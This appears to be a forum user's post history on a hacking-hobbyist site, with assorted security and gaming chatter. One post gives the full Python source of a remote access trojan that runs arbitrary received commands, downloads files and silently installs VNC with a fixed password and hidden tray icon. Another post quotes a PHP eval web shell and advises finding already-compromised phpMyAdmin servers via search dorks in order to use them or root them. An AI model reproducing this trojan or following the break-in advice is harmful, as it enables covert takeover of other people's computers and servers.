DingleBerries
Posts: 1,291
Posts posted by DingleBerries
There are going to be a bunch more "0-days" over the next few months that are going to be bogus. Some of them now are nothing but malware. Be wary of what you run.
-
I wish hak5 had down vote buttons.
-
source code?
-
Here is a RAT I have been working on in Python. It's not done. Download Terry the Trojan and use that as the client to send/receive data.
from Tkinter import * from tkMessageBox import * from ScrolledText import * import socket import sys portvar = 2727 try: if sys.argv[1] == "/port": try: portvar = int(sys.argv[2]) except: portvar = 2727 except: portvar = 2727 def std(string): stdbox.config(state=NORMAL) stdbox.insert(END,"" + string + "\n") stdbox.config(state=DISABLED) def cnnect(var="poo"): sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) success = 1 try: sockt.connect((ipbox.get(),portvar)) except: success = 0 std("Connection to " + ipbox.get() + " on port " + str(portvar) + " failed.") if success == 1: sockt.send(cmdbox.get()) retdata = sockt.recv(2048) std(retdata) root = Tk() root.title("Terry the Trojan") #FRAMES ipfrm = Frame(root) ipfrm.pack() cmdfrm = Frame(root) cmdfrm.pack() stdfrm = Frame(root) stdfrm.pack() #IP/Port Entry Widgets Label(ipfrm,text="Host/IP adress:").grid(row=1,column=1) ipbox = Entry(ipfrm,width=50) ipbox.grid(row=1,column=2) #Returned output widgets stdbox = ScrolledText(stdfrm,width=70,height=20,state=DISABLED,bg="#c0c0c0",fg="#000000") stdbox.grid(row=1,column=1) #Command sending widgets cmdbox = Entry(cmdfrm,width=50) cmdbox.grid(row=1,column=1) Button(cmdfrm,text="Send Command",command=cnnect).grid(row=1,column=2) cmdbox.bind("<Return>",cnnect) root.mainloop()
HAH, shit, wrong code. I'll post it in a min.
OK HERE is the RAT, sorry about that. You should be able to tell what the commands do.
import socket,os,sys,urllib,re,ftplib from time import sleep port = 2727 s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sockt = socket.socket(socket.AF_INET,socket.SOCK_STREAM) sockt.bind(('',port)) sockt.listen(1) while True: channel, details = sockt.accept() command = channel.recv(2048) if command == "kill": channel.send("Server trojan has been closed.") sys.exit() elif command == "ip": connect = s.connect(("www.whatismyipaddress.com", 80)) s.send('GET / HTTP/1.0\n\n') socketlines = s.recv(2048) lines = socketlines.split() ip = lines[len(lines) - 1] channel.send(ip) elif command == "whoami": channel.send(os.environ["USERNAME"]) elif command == "drive": channel.send(os.environ["HOMEDRIVE"]) elif command == "userfolder": channel.send(os.environ["HOMEPATH"]) elif command == "installvnc": urllib.urlretrieve('http://downloads.sourceforge.net/vnc-tight/tightvnc-1.3.10-setup.exe','update.exe') fs=os.popen3('update.exe /sp- /verysilent','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(1) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v Password /t Binary /d 68,DF,59,F8,C5,23,54,33','b') sleep(0.2) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(0.5) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v DisableTrayIcon /t REG_DWORD /d 1','b') sleep(1) fs=os.popen3('REG ADD HKLM\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(0.3) fs=os.popen3('REG ADD HKCU\SOFTWARE\ORL\WinVNC3 /v RemoveWallpaper /t REG_DWORD /d 0','b') sleep(1) fs=os.popen3('net start "VNC Server"','b') fs=os.popen3('del update.exe','b') channel.send("VNC was installed, password is vncserv.") elif command == "netstat": fs=os.popen3('netstat -ano>windsys.ini','b') sleep(2) f = open('windsys.ini') channel.send(f.read()) f.close() elif command == "whereami": channel.send(os.getcwd()) elif command.startswith("download "): file = command.replace("download ", "") 
urllib.urlretrieve(file,"file.exe") channel.send("File downloaded. Saved as 'file.exe', rename extension") else: csuc = 1 try: fs=os.popen3(command,'b') except: csuc = 0 if csuc == 1: channel.send("Command Sucessful") else: channel.send("Command Failed") channel.close()
-
Too much processing power. You will need a big-ass router.
-
Mine was 1<3m4|\|U3)
-
The pwnies being the pwned?
-
If you could get Airpwn running on a fon or other FOSS router then I think that would be more than enough.
-
I don't know of a forum software that doesn't send out *temporary* passwords in plain text. PHPBB, Simple Machines Forum and Invision Power Board all share this behaviour. If your email isn't secure, we can't help you on that front, other than suggest you look at hushmail.
I haven't played around with phpBB, but I know other forums that send you a reset link. If anything, I'd have expected to receive a temporary password and be asked to change it. I just hope that the password I am sent is hashed in the db after it has been sent to me.
Just saw your post, Vako. Glad they were hashed. Good luck BFing the good ones.
-
Python can do that with ease. This code does it for Google Groups but can be easily modified to fit your needs.
-
Darren has the compiled version of it on his site, link. I also have the AESkey find compiled if anyone needs that.
-
My favorite way is to use the "Welcome to phpMyAdmin" AND "Create new database" dork and find databases that have already been popped. Look for
<?php eval($_POST[cmd]);?>
And try to find the page where you send commands. That or root the box yourself from there.
-
Why am I being emailed a plain-text password when I try to recover my account? I know that I should change it, but I am not sure if others are sure about what to do.
-
Nope, not saying that at all. Just saying that brute forcing it isn't going to get you everything you need. Gotta actually solve it.
http://twitter.com/hak5darren/status/1664879332
If you haven't solved it, don't try to help with it.
-
Episode 5x11
in Hak5
Most of the shit Matt says is a bit pointless anyways. Bashing his own users and a really use Python script? He does know his servers and topography though.
Just like the elitist Linux users, the same crowd also exists in the Mac and Windows world. Use what works for you and shut up. If someone asks, then inform them, give them a demo... if not, let them do what they want.
-
Ditto
-
Fuck that. If I win I demand some of his hair.
-
Why not scan the domain and see what ports are open?
-
I am stuck on the lie atm
-
1st one is easy, but logging in is a bit harder.
-
Still won't stop boot hijack. Long live physical access!
-
whats this
in Gaming
ManwithWhiteFishForehead Kicking Game? >_> You, sir, are a genius.
-
whats this
in Gaming
Hai guise. I used to play this game. There were these options and some characters and you fought bad guys. I can't remember anything else about it, only that it was a long time ago. Can I has halp?
Resetting Gargoyle root password
in Security
Why not try the httpd exploit for dd-wrt? I don't know if it will work, but it is worth a try.